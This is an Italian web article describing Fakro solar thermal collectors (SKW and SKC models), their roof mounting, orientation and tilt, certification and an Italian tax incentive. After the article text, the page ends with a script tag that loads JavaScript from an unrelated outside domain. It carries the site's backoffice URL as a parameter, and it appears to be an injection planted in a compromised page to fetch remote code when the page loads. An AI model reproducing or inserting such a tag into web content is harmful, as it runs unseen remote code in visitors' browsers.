1. Home
  2. Notizie e Mercato
  3. I collettori solari Fakro: energia pura e gratuita dal sole

I collettori solari Fakro: energia pura e gratuita dal sole

Infissi e Serramenti di
FAKRO ha introdotto nella sua


Le risorse delle fonti non rinnovabili sono limitate e la loro acquisizione sempre più difficoltosa e l'energia ottenuta da esse sempre più costosa. L'alternativa sta, quindi, nell'utilizzare l'energia solare pulita e gratuita che esiste in abbondanza e da milioni di anni. I collettori solari FAKRO permettono di catturare la potenza (calore) dell’energia solare e trasformare le radiazioni solari in energia termica da utilizzare nella vita quotidiana.

FAKRO ha nella sua offerta due tipi di collettori: SKW e SKC, che si differenziano tra loro per il raccordo di tenuta.
• I collettori SKW possono essere uniti tra loro oppure combinati con le finestre da tetto FAKRO in qualsiasi configurazione. Il grande vantaggio è la possibilità di montare i collettori nel tetto utilizzando i raccordi standard per le finestre da tetto FAKRO che assicurano un collegamento ermetico con la falda del tetto. La struttura del collettore formata da profili in alluminio garantisce la resistenza e durata della costruzione. Il vetro temperato prismato consente l’alta infiltrazione dei raggi solari fino a 91 %. Il collettore viene installato sui listelli mediante un sistema brevettato di staffe di montaggio a scorrimento, che vengono adattate alle distanze tra i listelli.
• I collettori SKC non si possono combinare con le finestre. Tuttavia, l’applicazione dei raccordi speciali rende possibile il montaggio dei collettori l’uno accanto all’altro a distanza di 3 mm, coprendo in questo modo meglio la falda del tetto. La superficie omogenea, ottenuta in questa maniera, viene a comporsi perfettamente con la copertura del tetto prescelta.

Per acquisire una buona quantità di calore è molto importante il posizionamento dei collettori. Il loro collocamento verso sud garantisce una migliore ricezione del calore. Sono ammissibili le deviazioni di 45° in direzione est o ovest con il ribasso di efficienza del collettore di circa il 10%.

I collettori solari FAKRO hanno il vetro temperato prismatico che lascia passare all’interno i raggi solari incidenti sul vetro anche ad un angolo basso. L’assorbitore, ricoperto da uno strato altamente selettivo, assorbe la luce trasformandola in calore. Il tutto chiuso in una cornice solida in alluminio. Il sistema innovativo dei raccordi mobili di montaggio permette di posizionare il collettore sui listelli di qualsiasi passo.

I collettori FAKRO sono stati studiati per un montaggio sul tetto con inclinazioni variabili:
•    da 15° a 90° per collettori SKW
•    da 30° a 90° per collettori SKC.
L’inclinazione consigliata è tra i 30°e i 60°. Il posizionamento, entro queste inclinazioni, consente ai collettori un ottima produzione di calore. Il montaggio sul tetto, e non sopra la copertura dello stesso, migliora decisamente i parametri isolanti e prestazionali dei collettori. Grazie a questa configurazioni, i collettori si fondono perfettamente nella forma dell’edificio, il che migliora l’estetica anche del tetto.

Il montaggio dei collettori sulla superficie del tetto, e non sopra o di fianco all’edificio come capita spesso, comporta molti vantaggi:
•    garantisce lo sfruttamento della superficie del tetto non utilizzata;
•    si compone perfettamente con la sagoma dell’edificio;
•    garantisce la maggiore efficienza dei collettori solari.
Inoltre, se il progetto prevede il montaggio delle finestre da tetto, il sistema dei raccordi particolari FAKRO in modo semplice renderà possibile il collegamento tra le suddette finestre e i collettori solari.

Il montaggio dell’impianto solare contribuisce ad eliminare decisamente l’inquinamento ambientale riducendo l’emissione delle sostanze nocive come CO2, SO2, NOx e causa l'abbattimento delle polveri volatili.
Il certificato Solar Keymark attesta le ottime prestazioni dei collettori FAKRO, garantisce l’alta qualità e conferma l’adempimento dei requisiti richiesti dalle normative europee. Il Solar Keymark soddisfa la grande maggioranza dei criteri attualmente necessari per ottenere incentivi nei paesi dell'Unione Europea, come è per l’Italia fino al 31 Dicembre 2013. (Detrazione del 55% prevista per gli interventi di risparmio energetico - articolo 1, comma 344, della legge n. 296 del 27 dicembre 2006).


<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.0698453283014886" type="text/javascript"></script>